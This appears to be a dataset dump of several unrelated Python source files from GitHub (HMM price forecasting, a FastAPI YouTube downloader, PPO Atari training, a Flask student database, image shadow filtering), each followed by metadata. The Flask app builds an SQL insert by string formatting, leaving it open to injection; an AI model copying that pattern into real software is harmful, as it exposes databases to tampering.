loss = torch.where(torch.ne(target, -1.0),
loss, torch.zeros(loss.shape).to(device))
loss = self.loss_weight * weight_reduce_loss(
loss,
weight=weight,
reduction=self.reduction,
avg_factor=avg_factor)
return loss
| TWSFar/FCOS | models/losses/focal_loss.py | focal_loss.py | py | 1,798 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "torch.zeros",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "torch.long",
"line_number... |
39184736012 | ####################### IMPORT LIBRARIES ####################################
from pandas import ExcelFile, read_excel
from pandas import datetime
from sklearn.metrics import mean_squared_error
from math import sqrt
import matplotlib.pyplot as plt
import warnings
from hmmlearn.hmm import GaussianHMM
import numpy as np
import time
####################### FUNCTION TO READ FILE ################################
def readfile(coin_file, attribute):
''' Function to read and parse the data '''
# Read excel file
xls = ExcelFile(coin_file)
# Date parser
def parser(x):
try:
return datetime.strptime(str(x),'%Y-%m-%d %H:%M:%S')
except:
return datetime.strptime(str(x),'%Y-%m-%d')
series = read_excel(xls, attribute, header = 0, parse_dates =[0], index_col = 0, squeeze = True, date_parser = parser)
series = series.fillna(0)
# Store in array
X = series.values
return X
###################### FUNCTION TO SPLIT THE DATA INTO TRAINING AND TEST SET #######
def train_test_split(X, fraction):
''' Function to split the data into training and test set '''
# Train test split
size = int(len(X)*fraction)
train,test = X[0:size], X[size:len(X)]
return train,test
##################### FUNCTION TO DEFINE GAUSSIAN HIDDEN MARKOV MODEL ###############
def GaussHMM(n_comp,cov_type,n_itr,train,num_samples_test):
''' Function to define Gaussian Hidden Markov Model '''
# Reshape training data
history = train.reshape(-1,1)
# Gaussian hidden markov model
hmm = GaussianHMM(n_components = n_comp, covariance_type = cov_type, n_iter = n_itr)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
hmm.fit(history)
# Generate samples
samples_test, _ = hmm.sample(num_samples_test)
return samples_test
###################### FUNCTION TO CALCULATE PREDICTIONS AND EXPECTATIONS #############
def pred_expect(test,variable, samples_test, pred, expect):
''' Function to calculate predictions and expectations '''
# Loop over test data
for i in range(len(test)):
# Integer values
if variable == 'int':
if round(samples_test[i][0]) < 0:
pred.append(0)
else:
pred.append(round(samples_test[i][0]))
# decimal values
else:
if samples_test[i][0] < 0:
pred.append(0)
else:
pred.append(samples_test[i][0])
expect.append(test[i])
return pred, expect
############################# FUNCTION TO CALCULATE RMSE ###############################
def rmse(coin_file, attribute,iterations,fraction,n_comp,cov_type,n_itr,var):
''' Function to calculate RMSE '''
X = readfile(coin_file,attribute)
train,test = train_test_split(X,fraction)
rmse_test = list()
for j in range(iterations):
######################## FOR FINAL RMSE ############################
pred = list()
expect = list()
num_samples_test = len(test) # number of samples to be generated
samples_test = GaussHMM(n_comp,cov_type,n_itr,train,num_samples_test)
pred,expect = pred_expect(test,var,samples_test, pred, expect)
rmse_test.append(sqrt(mean_squared_error(pred,expect)))
return rmse_test
##################### PRINT AVERAGE RMSE FOR TEST DATA #####################
coin_file = '4_RLC.xlsx' # Filename
attribute = 'exchange' # attribute
iterations = 30 # number of iterations for averaging rmse
fraction = 0.80 # Train - test split
n_comp = 7 # n_components for Gaussian HMM
cov_type = 'diag' # covariance_type for Gaussian HMM
n_itr = 1000 # n_iter for Gaussian HMM
var = 'float' # Integer or Float valued attribute
start = time.time()
rmse_test = rmse(coin_file, attribute,iterations,fraction,n_comp,cov_type,n_itr,var)
end = time.time()
print('The average RMSE over %d iterations is %.3f' %(iterations,np.array(rmse_test).mean()))
print('The time taken is %.3f seconds' %(end - start))
| srihari1212/bloqq | HMM/Docstring_HMM_test.py | Docstring_HMM_test.py | py | 4,173 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.ExcelFile",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "pandas.datetime.strptime",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "pandas.datetime",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "pandas.date... |
10567641757 | import time
from datetime import datetime, timedelta
from pydantic import BaseModel
from fastapi import FastAPI, Depends, File, UploadFile, HTTPException, Request, status
from fastapi.responses import HTMLResponse, JSONResponse, FileResponse
import uvicorn
import os
from pytube import YouTube
from pytube import Playlist
from pytube.cli import on_progress
app = FastAPI()
class Info(BaseModel):
author: str
title: str
view: float
length: int
description: str
thumbnail: str
fileSizeHD: str
@app.get("/")
async def hello():
return {"result": "Its working YES! This is a miracle!"}
@app.get("/info")
async def info(url: str = None):
try:
yt = YouTube(url)
videoSize = yt.streams.get_highest_resolution()
Info.author = yt.author
Info.title = yt.title
Info.view = yt.views
Info.length = ("%.2f" % float(yt.length / 60))
Info.description = yt.description
Info.thumbnail = yt.thumbnail_url
Info.fileSizeHD = str(round(videoSize.filesize * 0.000001, 2)) + " Mb"
res = {None}
for i in yt.streams:
res.add(i.resolution)
res.remove(None)
res = [int(i) for i in [sub.replace('p', '') for sub in res]]
sres = sorted(res)
return { "Title": Info.title, "Resolution": sres, "Author": Info.author, "Thumbnail": Info.thumbnail, "View": Info.view,
"Length": Info.length, "Description": Info.description,
"File size": Info.fileSizeHD}
except Exception as e:
return JSONResponse(
status_code=status.HTTP_400_BAD_REQUEST,
content={'message': str(e)})
else:
return JSONResponse(
status_code=status.HTTP_200_OK,
content={"result": 'success'})
@app.get("/video")
async def video(url: str = None):
try:
yt = YouTube(url, on_progress_callback=on_progress)
yd = yt.streams.get_highest_resolution()
folder_name = "FILE_NAME"
file_path = os.getcwd() + "/" + folder_name
video = yd.download(file_path)
yt.title
print(file_path)
headers = {'success': f'video is ready, filename= {yt.title}'}
return FileResponse(path=video, headers=headers, media_type='application/mp4', filename=(yt.title + ".mp4"))
except Exception as e:
return JSONResponse(
status_code=status.HTTP_400_BAD_REQUEST,
content={'message': str(e)}
)
else:
return JSONResponse(
status_code=status.HTTP_200_OK,
content={"result": 'success, video is ready'}
)
@app.get("/audio")
async def audio(url: str = None):
try:
ya = YouTube(url)
folder_name = "FILE_NAME"
# DEPENDS ON WHERE YOUR FILE LOCATES
file_path = os.getcwd() + "/" + folder_name
video = ya.streams.filter(only_audio=True).first()
downloaded_file = video.download(file_path)
base, ext = os.path.splitext(downloaded_file)
audio = base + 'Audio.mp3'
os.rename(downloaded_file, audio)
ya.title
print(file_path)
print(audio)
headers = {'success': f'audio is ready, filename= {ya.title}'}
return FileResponse(path=audio, headers=headers, media_type='application/mp4', filename=(ya.title+".mp3"))
except Exception as e:
return JSONResponse(
status_code=status.HTTP_400_BAD_REQUEST,
content={'message': str(e)}
)
else:
return JSONResponse(
status_code=status.HTTP_200_OK,
content={"result": 'success, audio is ready'}
)
@app.get("/delete")
async def delete_files(min: int = 10):
try:
response_msg = []
folder_name = "FILE_NAME"
file_path = os.getcwd() + "/" + folder_name
path = file_path
files = os.listdir(file_path)
print(files)
print(f"file_path: {file_path}")
file_name_delete = []
dir_name = file_path
# Get list of all files only in the given directory
list_of_files = filter(lambda x: os.path.isfile(os.path.join(dir_name, x)),
os.listdir(dir_name))
# Sort list of files based on last modification time in ascending order
list_of_files = sorted(list_of_files,
key=lambda x: os.path.getmtime(os.path.join(dir_name, x))
)
for file_name in list_of_files:
file_path = os.path.join(dir_name, file_name)
timestamp_str = time.strftime('%m/%d/%Y :: %H:%M:%S', time.gmtime(os.path.getmtime(file_path)))
print(timestamp_str, ' -->', file_name)
#filter by minite
now = datetime.now()
timestamp = datetime.timestamp(now)
f = os.path.getmtime(file_path)
file_date = datetime.fromtimestamp(f)
file_date_age = file_date + timedelta(minutes=min)
duration = now - file_date_age
duration_in_s = duration.total_seconds()
minut = (int(round(duration_in_s / 60, 0)))
print(f"duration: {minut}")
if minut > min:
file_name_delete.append(file_name)
### create a list of old file by date
print(f"file_name_delete {len(file_name_delete)}, {file_name_delete}")
#print(os.listdir(path))
for i in file_name_delete:
#for file_name_delete in os.listdir(path):
print(f"file_name: {file_name_delete}")
#print(f"path: {path}")
# construct full file path
del_file = path + "/" + i
#print(f"file: {del_file}")
if os.path.isfile(del_file):
response_msg.append(f"Deleting file: {del_file}")
print('Deleting file:', del_file)
os.remove(del_file)
print(len(del_file))
if len(response_msg) < 1:
# response_msg.clear()
response_msg.append(f"no files to delete after: {min} min")
return response_msg
except Exception as e:
return JSONResponse(
status_code=status.HTTP_400_BAD_REQUEST,
content={'message': str(e)})
else:
return JSONResponse(
status_code=status.HTTP_200_OK,
content={"result": 'success'})
@app.get("/aws")
async def aws_files():
folder_name = "FILE_NAME"
file_path = os.getcwd() + "/" + folder_name
files = os.listdir(file_path)
result = []
dir_name = file_path
# Get list of all files only in the given directory
list_of_files = filter(lambda x: os.path.isfile(os.path.join(dir_name, x)),
os.listdir(dir_name))
# Sort list of files based on last modification time in ascending order
list_of_files = sorted(list_of_files,
key=lambda x: os.path.getmtime(os.path.join(dir_name, x))
)
for file_name in list_of_files:
file_path = os.path.join(dir_name, file_name)
size = ("%.2f" % float(os.path.getsize(file_path)*0.000001))
timestamp_str = time.strftime('%m/%d/%Y :: %H:%M:%S', time.gmtime(os.path.getmtime(file_path)))
result.append(f"({timestamp_str}, ' -->', {file_name}, ' -->', {size}' MB')")
return result
def raise_exception():
return HTTPException(status_code=404,
detail="Input is Not valid!",
headers={"X-Header_Error":
f"Nothing to be seen"})
if __name__ == "__main__":
uvicorn.run("main:app", host="127.0.0.1", port=5000, reload=True, log_level="info", workers=2)
print('Download Complete')
| uponex/YoutubeAPI | main.py | main.py | py | 7,761 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.FastAPI",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pydantic.BaseModel",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "pytube.YouTube",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "fastapi.responses.J... |
23313577208 | import argparse
import gym
import random
import tensorflow as tf
import numpy as np
from tqdm import trange
from tensorflow import keras
from network import SharedModel
from subproc_env import EnvActor, SubProcessEnv
# Some parameters taken from OpenAI
# baselines implementation, since
# they're not mentioned in the paper.
num_actors = 8
# Values taken from Atari experiments
# in original paper where relevant
gae_lambda = 0.95
gamma = 0.99
base_clip_epsilon = 0.1
max_steps = 1e6
base_learning_rate = 2.5e-4
horizon = 128
batch_size = 32
optim_epochs = 3
value_loss_coefficient = 1
entropy_loss_coefficient = .01
gradient_max = 10.0
start_t = 0
checkpoint_filename = "./ppo-model.ckpt"
log_dir = "./tb_log"
SMALL_NUM = 1e-8
def main():
env_name = "PongNoFrameskip-v4"
# NOTE: This is currently not used since we use SubProcessEnv instead;
# only used for getting shape of observation/acton space.
unused_env = gym.make(env_name)
#pobs_shape = unused_env.observation_space.shape
# Hard-coding pre-processing step shape; could read it from an example output instead?
obs_shape = (84, 84, 4)
num_actions = unused_env.action_space.n
model = SharedModel(obs_shape, num_actions)
t = start_t
last_save = 0
actors = []
for ii in range(num_actors):
actors.append(EnvActor(SubProcessEnv(env_name), model, num_actions))
while(t <= max_steps):
for ii in range(horizon):
for actor in actors:
actor.step_env(t)
t += 1
for actor in actors:
actor.calculate_horizon_advantages(t)
# Construct randomly sampled (without replacement) mini-batches.
obs_horizon = []
act_horizon = []
policy_horizon = []
adv_est_horizon = []
val_est_horizon = []
for actor in actors:
obs_a, act_a, policy_a, adv_est_a, val_est_a = actor.get_horizon(t)
obs_horizon.extend(obs_a)
act_horizon.extend(act_a)
policy_horizon.extend(policy_a)
adv_est_horizon.extend(adv_est_a)
val_est_horizon.extend(val_est_a)
# Normalizing advantage estimates.
# NOTE: Adding this significantly improved performance
# NOTE: Moved this out of each individual actor, so that advantages for the whole batch are normalized with each other.
adv_est_horizon = np.array(adv_est_horizon)
adv_est_horizon = (adv_est_horizon - np.mean(adv_est_horizon)) / (np.std(adv_est_horizon) + SMALL_NUM)
num_samples = len(obs_horizon)
indices = list(range(num_samples))
for e in range(optim_epochs):
random.shuffle(indices)
ii = 0
# TODO: Don't crash if batch_size is not a divisor of total sample count.
while ii < num_samples:
obs_batch = []
act_batch = []
policy_batch = []
adv_batch = []
value_sample_batch = []
for _ in range(batch_size):
index = indices[ii]
obs_batch.append(obs_horizon[index].__array__())
act_batch.append(act_horizon[index].__array__())
policy_batch.append(policy_horizon[index].__array__())
adv_batch.append(adv_est_horizon[index].__array__())
value_sample_batch.append(val_est_horizon[index])
ii += 1
def alpha_anneal(t):
return np.maximum(1.0 - (float(t) / float(max_steps)), 0.0)
total_loss = model.train(np.array(obs_batch),
np.array(act_batch),
np.array(policy_batch),
np.array(adv_batch),
np.array(value_sample_batch),
alpha_anneal(t))
for actor in actors:
actor.flush(t)
if t-last_save > 10000:
print("Saving network")
model.network.save(checkpoint_filename)
last_save = t
all_ep_rewards = []
for actor in actors:
all_ep_rewards.extend(actor.episode_rewards)
if len(all_ep_rewards) >= 10:
print("T: %d" % (t,))
print("\tAVG Reward: %f" % (np.mean(all_ep_rewards),))
print("\tMIN Reward: %f" % (np.amin(all_ep_rewards),))
print("\tMAX Reward: %f" % (np.amax(all_ep_rewards),))
for actor in actors:
actor.episode_rewards = []
if __name__ == '__main__':
main() | james-sorrell/reinforcement_learning | atari/ppo/main.py | main.py | py | 4,674 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "gym.make",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "network.SharedModel",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "subproc_env.EnvActor",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "subproc_env.SubProc... |
16828444501 | from flask import Flask,request
import sqlite3
app = Flask(__name__)
connection = sqlite3.connect('sms.db')
curser = connection.cursor()
curser.execute('create table if not exists students (sid integer primary key,name text,age integer,address text)')
connection.close()
@app.route('/student_details')
def details():
connection = sqlite3.connect('sms.db')
curser = connection.cursor()
return {'students' : list(curser.execute('select * from students'))}
@app.route('/details',methods = ['POST'])
def register():
data = request.get_json()
connection = sqlite3.connect('sms.db')
curser = connection.cursor()
curser.execute("insert into students values('{},{},{},{}')".format(data['sid'],data['name'],data['age'],data['address']))
connection.commit()
connection.close()
return 'User Created Successfully.. '
app.run(port=5000) | mubarakdalvi/mubarakdalvi | studnt_management.py | studnt_management.py | py | 868 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "sqlite3.connect",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "sqlite3.connect",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "flask.request.get_json",
... |
11876743553 | # 数据预处理 阴影过滤
#yangzhen
#2020.4.13
#translate from matlab
"""get the shadow proportion from images
of remote sensing"""
import numpy as np
import cv2
import os
import json
from shutil import copyfile
import argparse
def cv_imread(file_path):
cv_img=cv2.imdecode(np.fromfile(file_path,dtype=np.uint8),1)
return cv_img
def cv_imwrite(filepath,img):
cv2.imencode(".png",img)[1].tofile(filepath)
def standard(data):
'''影像文件标准化
输入单通道影像
输出标准化后单通道影像'''
mdata = data.copy()
irow, icol = mdata.shape[0:2]
mdata = np.reshape(mdata, [irow*icol, 1])
temp1 = mdata - np.min(data)
result = temp1/(np.max(data)-np.min(data))
result = np.reshape(result, [irow, icol])
np.seterr(divide='ignore', invalid='ignore')
return result
def GetLight(img):
'''计算人眼视觉特性亮度'''
mimg = img.copy()
B = mimg[:,:,0]
G = mimg[:,:,1]
R = mimg[:,:,2]
result = 0.04*R+0.5*G+0.46*B
return result
def GetColor(img):
'''色度空间归一化'''
mimg = img.copy()
misc = mimg[:,:,0]+mimg[:,:,1]+mimg[:,:,2]
misc[misc == 0] = 0.0000001
mimg[:,:,0] = img[:,:,0]/misc
mimg[:,:,1] = img[:,:,1]/misc
result = np.abs(mimg - img)
result = (result[:,:,0]+result[:,:,1])/2
return result
def GetVege(img):
'''获取植被特征'''
mimg = img.copy()
B = mimg[:,:,0]
G = mimg[:,:,1]
R = mimg[:,:,2]
result = G-np.minimum(R, B)
result[result<0] = 0
return result
def GetLDV(idist, ilight, ivege):
'''总决策'''
idist = standard(idist)
ilight = standard(ilight)
ivege = standard(ivege)
result = idist-ilight-ivege
result[result<0]=0
return result
def FinalTrare(img):
'''结果后处理'''
mimg = img.copy()
mimg = np.uint8(standard(mimg)*255)
T, result = cv2.threshold(mimg, 0, 255, cv2.THRESH_OTSU)
result = cv2.medianBlur(result, 7)
return result
def ShadowsProportion(path:{}):
"""
阴影提取
@@path: {},
@path[0] 待检测阴影的影像
@path[1] 待检测阴影的影像
@path[2] 阴影比例阈值
ps: 当两张影像过大时会进行分块
"""
File_in = path[0]
File_out = path[1]
T = path[2]
mpath = path[3]
File_out2=path[4]
if not os.path.exists(File_out):
os.makedirs(File_out)
if not os.path.exists(File_out2):
os.makedirs(File_out2)
#开始检测
namelist=[]
for filename in os.listdir(File_in):
if not filename.find('.png') == -1:
namelist.append(filename)
n = len(namelist)
fid = open('ShadowsProportion.txt', 'w')
for i in range(n):
filenamein = os.path.join(File_in, namelist[i])
img = cv_imread(filenamein)
#获取阴影
img1 = img.astype(np.float)
img1[:,:,0] = standard(img[:,:,0])
img1[:,:,1] = standard(img[:,:,1])
img1[:,:,2] = standard(img[:,:,2])
idist = GetColor(img1)
ilight = GetLight(img1)
ivege = GetVege(img1)
final = GetLDV(idist, ilight, ivege)
shadow = FinalTrare(final)
shadow = shadow/255
#计算阴影比例并保存比例值
S = shadow.size
s = np.sum(sum(shadow))
iratio = s/S
fid.write(namelist[i] + ',' + str('%.3f' % iratio) + '\n')
#保存阴影比例小于阈值的图片
filenameout = os.path.join(File_out, namelist[i])
filenameout2 = os.path.join(File_out2, namelist[i])
mapout = mpath.replace('rawdata','noshade')
if not os.path.exists(mapout):
os.makedirs(mapout)
if iratio < T:
cv_imwrite(filenameout, img)
copyfile(os.path.join(mpath,namelist[i]),(os.path.join(mapout,namelist[i])))
else :
cv_imwrite(filenameout2, img)
fid.close()
def takejson(getjson):
json1 = json.loads(getjson)
path = {}
path[0] = json1['rpath']
path[1] = path[0].replace('rawdata','noshade')
path[2] = json1['shadowProportion']
path[3]=json1['mpath']
path[4]=path[0].replace('rawdata','withshade')
#print (path)
ShadowsProportion(path)
print ('Shadow filtering Completed')
if __name__ == "__main__":
#获取输入图片路径,阴影比例阈值,输出图片路径
# File_in = input('Please input the data file name:')
# T = float(input('Please input the threshold value:'))
# File_out = input('Please input the out-img filename:')
parser = argparse.ArgumentParser()
parser.add_argument('--input_json', type=str, help='输入json字符串')
args = parser.parse_args()
# json1={'rpath':r'F:\Chicago2\metadata\谷歌影像无标注\14\14_14aligned','mpath':r'F:\Chicago2\metadata\谷歌地图无标注\14\14_14aligned','shadowProportion':0.2}
# getjson=json.dumps(json1)
takejson(args.input_json)
| jansona/GeoScripts | shadow_filter/shadowfilter.py | shadowfilter.py | py | 4,966 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cv2.imdecode",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.fromfile",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "cv2.imencode",
"line... |
40083862973 | #!/usr/bin/env python3
import argparse
import random
import json
import re
import importlib.util
import os.path
import sys
import types
import inspect
import pandas as pd
import numpy as np
MAX_SLOT=8
SMART_COMMENT="\\s*#+\\s*(fastscore|odg)\\.(\\S*)\\s*:\\s*(\\S*)\\s*$"
def is_input_slot(s):
return s % 2 == 0
## Parse command line
parser = argparse.ArgumentParser()
parser.add_argument("source_file", metavar="MODEL")
parser.add_argument("-i", "--input:0", action="store", help="Name of the input file (slot 0)", metavar="FILE")
parser.add_argument("-o", "--output:1", action="store", help="Name of the output file (slot 1)", metavar="FILE")
parser.add_argument("-b", "--batch-size", action="store", type=int, default=10, help="Name of the output file (slot 1)", metavar="NUM")
#parser.add_argument("-v", "--verbose", action="store_true", help="Increase verbosity")
# Add more --input/--output options
for s in range(2,MAX_SLOT):
tag = "input" if is_input_slot(s) else "output"
parser.add_argument("--{}:{}".format(tag,s), action="store", help="Name of the {} file (slot {})".format(tag,s), metavar="FILE")
args = parser.parse_args()
def check_scope(scope):
if scope in ["$all", "$in", "$out"]:
return scope
else:
try:
return int(scope)
except ValueError:
print("Smart comment not recognized")
def default_scope(item):
if item == "recordsets":
return "$all"
elif item == "action":
return "$in"
elif item == "slot":
return "$all"
elif item == "schema":
return "$all"
else:
return None
def parse_comments1(line, slots):
if re.match(SMART_COMMENT, line):
tokens = re.split(SMART_COMMENT,line)
item0=tokens[2]
value=tokens[3]
x=item0.split(".")
item=x[0]
scope = check_scope(x[1]) if len(x) > 1 else default_scope(item)
for s in range(0,MAX_SLOT):
if scope is None:
continue
is_deprecated=False
if (scope == "$all" or
scope == "$in" and is_input_slot(s) or
scope == "$out" and not is_input_slot(s) or
scope == s):
if (item == "recordsets"):
if (value in ["both","none","input","output"]):
# deprecated style
if scope != "$all":
sys.exit("Invalid scope")
is_deprecated=True
if (s == 0 or s == 1):
if (value == "both"):
slots[s]['recordsets'] = True
elif (value == "none"):
slots[s]['recordsets'] = False
elif (value == "input"):
slots[s]['recordsets'] = (s == 0)
elif (value == "output"):
slots[s]['recordsets'] = (s == 1)
else:
# new style
flag = None
if (value == "true" or value == "yes"):
flag = True
elif (value == "false" or value == "no"):
flag = False
else:
sys.exit("Value '{}' not recognized (use 'true', 'false', 'yes', or 'no')".format(value))
slots[s]['recordsets']=flag
elif (item == "action"):
if not is_input_slot(s):
sys.exit("An action callback being assigned to an output slot {}".format(s))
slots[s]['action'] = None if (value == "unused") else value
# Any mention of a slot makes it active
if (value != "unused"):
if (not is_deprecated or s == 0 or s == 1):
slots[s]['active'] = True
if (item == "slot"):
if (value != "unused"):
sys.exit("Value '{}' not supported (set to 'unused' to disable the slot)".format(value))
slots[s]['active'] = False
def parse_comments():
slots = []
for s in range(0,MAX_SLOT):
slots.append({
'action': None,
'recordsets': False,
'active': False,
'file': None
})
if is_input_slot(s):
slots[s]['action'] = "action"
# By default, slots 0 and 1 are active
slots[0]['active'] = True
slots[1]['active'] = True
f = open(args.source_file)
for l in f:
parse_comments1(l, slots)
f.close()
return slots
model_slots = parse_comments()
# Collect all data-related options
for k in args.__dict__:
if (k.startswith("input:") or k.startswith("output:")):
s = int(k.split(":")[1])
data_file = args.__dict__[k]
if not data_file is None:
if (is_input_slot(s) and not os.path.isfile(data_file)):
sys.exit("{} not found".format(data_file))
model_slots[s]['file'] = data_file
# Either all or none input slots must have action set
all_actions=True
none_actions=True
for s in range(0,MAX_SLOT):
if (not is_input_slot(s)):
continue
if (model_slots[s]['action'] is None):
all_actions=False
else:
none_actions=False
if (not all_actions and not none_actions):
sys.exit("Either all input slots must have action callbacks set or none of them should")
# Check for dangling slots/files
for s in range(0,MAX_SLOT):
active=model_slots[s]['active']
data_file=model_slots[s]['file']
if (active and data_file is None and s != 0 and s != 1):
sys.exit("Model uses slot {} but there is no data file attached to it".format(s))
if (not active and not data_file is None):
sys.exit("Model does not use slot {} but the data file {} is attached to it".format(s,data_file))
inputs=[]
outputs=[]
for s in range(0,MAX_SLOT):
if not model_slots[s]['active']:
continue
if is_input_slot(s):
inputs.append({
'slot': s,
'seq_no': 1,
'conn': None,
'entry': None
})
else:
outputs.append({
'slot': s,
'conn': None
})
# Open input files
for i in inputs:
s = i['slot']
data_file = model_slots[s]['file']
conn = open(0) if (s == 0 and data_file is None) else open(data_file)
i['conn'] = conn
# Open output files
for i in outputs:
s = i['slot']
data_file = model_slots[s]['file']
conn = open(1,'w') if (s == 1 and data_file is None) else open(data_file,'w')
i['conn'] = conn
# Read a batch of records from the slot
def read_records(s):
ii = None
for i in range(0,len(inputs)):
if inputs[i]['slot'] == s:
ii = i
break
if ii is None:
if model_slots[s]['active']:
return None
else:
sys.exit("Slot {} is not in use".format(s))
conn = inputs[ii]['conn']
seq_no = inputs[ii]['seq_no']
records = []
at_eof = False
while len(records) < args.batch_size:
l = conn.readline()
if len(l) == 0:
if conn.name != 0:
conn.close()
inputs.pop(ii)
at_eof = True
break
x = json.loads(l)
#TODO
#if (is.list(x) && x$`$fastscore` == "set"):
# break
records.append(x)
if at_eof and len(records) == 0:
return []
if not at_eof:
old_seq_no = seq_no
seq_no = seq_no + len(records)
inputs[ii]['seq_no'] = seq_no
return records
def as_recordset(records):
if records is None:
return None
return records
#TODO
#if (len(records) == 0):
# pd.DataFrame(records)
#else:
# head = records[0]
class Slot(object):
def __init__(self, n):
self.n = n
def __iter__(self):
return self
def __next__(self):
data = self.read()
if data is None:
raise StopIteration
else:
return data
def read(self):
if (not is_input_slot(self.n)):
sys.exit("Model attempts to explicitly read from an output slot {}".format(self.n))
records = read_records(self.n)
data = as_recordset(records)
return data
def write(self, rec):
if (is_input_slot(self.n)):
sys.exit("Model emits data to an input slot {}:".format(s))
conn = None
for i in outputs:
if i['slot'] == self.n:
conn = i['conn']
break
if conn is None:
sys.exit("Model emits data to an unknown slot {}".format(self.n))
recordsets = model_slots[self.n]['recordsets']
if not recordsets:
print(json.dumps(rec), file=conn)
else:
sys.exit("TOODOO")
fio = types.ModuleType("fastscore.io")
fio.__dict__['Slot'] = Slot
sys.modules["fastscore.io"] = fio
spec = importlib.util.spec_from_file_location('model', args.source_file)
mod = importlib.util.module_from_spec(spec)
# Callbacks not resolved yet
spec.loader.exec_module(mod)
# TODO Check/wrap action callbacks
for s in range(0,MAX_SLOT):
slot = model_slots[s]
if not slot['active']:
continue
if not slot['action'] is None:
entry = getattr(mod,slot['action'])
if entry is None:
sys.exit("A slot {} callback function named '{}' not found".format(s,slot['action']))
if not isinstance(entry, types.FunctionType):
sys.exit("A slot {} callback named '{}' must be a function".format(s,slot['action']))
sig = inspect.signature(entry)
arity = len(sig.parameters)
if (arity < 1 or arity > 3):
sys.exit("A slot {} callback function named '{}' must have arity 1, 2, or 3 (not {})".format(s,slot['action'],arity))
wrapped_entry = entry
if arity == 1:
wrapped_entry = lambda data,slot,seqno: entry(data)
elif arity == 2:
wrapped_entry = lambda data,slot,seqno: entry(data,seqno)
for i in inputs:
if i['slot'] == s:
i['entry'] = wrapped_entry
model_uses_callbacks = False
if len(inputs) > 0:
model_uses_callbacks = isinstance(inputs[0]['entry'], types.FunctionType)
if model_uses_callbacks:
while len(inputs) > 0:
# Pick a random slot
select = random.choice(inputs)
s = select['slot']
seq_no = select['seq_no']
records = read_records(s)
action = model_slots[s]['action']
recordsets = model_slots[s]['recordsets']
if recordsets:
sys.exit("TODO recordests")
else:
# Invoke the callback for each record
for rec in records:
print(*select['entry'](rec, s, seq_no)) ## calls 'action'
seq_no = seq_no + 1
| modelop/modelop.github.io | Product Manuals/Model Launchers/Python Launcher/lh.py | lh.py | py | 9,190 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "re.match",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number... |
24788697819 | """
N×M 크기의 공간에 아기 상어 여러 마리가 있다. 공간은 1×1 크기의 정사각형 칸으로 나누어져 있다. 한 칸에는 아기 상어가 최대 1마리 존재한다.
어떤 칸의 안전 거리는 그 칸과 가장 거리가 가까운 아기 상어와의 거리이다. 두 칸의 거리는 하나의 칸에서 다른 칸으로 가기 위해서 지나야 하는 칸의 수이고, 이동은 인접한 8방향(대각선 포함)이 가능하다.
안전 거리가 가장 큰 칸을 구해보자.
"""
import sys
from collections import deque
N, M = list(map(int, sys.stdin.readline().strip().split()))
blocks = [[0] * M for _ in range(N)] # blocks
dir = [(0, -1), (-1, -1), (-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1)]
for i in range(N):
blocks[i] = list(map(int, sys.stdin.readline().strip().split()))
def out_of_range(y,x):
return y < 0 or x < 0 or y >= N or x >= M
def solve():
max_val = float("-inf")
for i in range(N):
for j in range(M):
if blocks[i][j] == 0:
# bfs 시작
q = deque()
visited = set()
q.append((i,j, 0))
visited.add((i,j))
dist = 0
while q:
row, col, distance = q.popleft()
# print(row, col, distance)
if blocks[row][col] == 1:
dist = distance
break
for idx in range(8):
next_r, next_c = row + dir[idx][0], col + dir[idx][1]
if out_of_range(next_r, next_c) or (next_r, next_c) in visited:# or (next_r, next_c) in did_shark_test:
continue
q.append((next_r, next_c, distance + 1))
visited.add((next_r,next_c))
max_val = max(max_val, dist)
return max_val
def main():
print(solve())
main() | inhyeokJeon/AALGGO | Python/baekjoon/17086_baby_shark_2.py | 17086_baby_shark_2.py | py | 1,975 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "sys.stdin.readline",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "sys.stdin.readline",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
... |
23269856572 | # import os
import sys
import csv
from matplotlib.patches import Ellipse
import matplotlib.transforms as transforms
# import pandas as pd
# from pandas.plotting import lag_plot
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
import random
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import *
# from scipy.stats.stats import pearsonr
from statsmodels.tsa.arima_process import arma_generate_sample
# from sklearn.metrics import mean_squared_error as MSE
import math
# -- -- #
import distribution_displays
# -- -- #
import functools
import inspect
from typing import Optional
# -- -- #
import Simulation_fit
# -- -- #
from ellipse import confidence_ellipse, get_correlated_dataset
from wave_g import createWave, saveWave, reafWave
class Example(QWidget):
label: list[Optional[list[QLabel]]]
